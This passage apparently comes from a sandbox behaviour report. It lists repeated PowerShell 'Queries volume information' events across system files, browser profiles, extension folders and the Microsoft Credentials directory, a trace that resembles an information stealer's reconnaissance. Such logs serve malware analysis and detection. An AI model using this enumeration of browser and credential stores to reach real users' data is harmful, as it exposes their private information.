            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\History VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Credentials VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\BackstageInAppNavCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED} VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\AppCache\SUDOA50H VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8HYVANJG VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QP9K14N5 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000105 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000161 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000163 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000165 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCache VolumeInformation
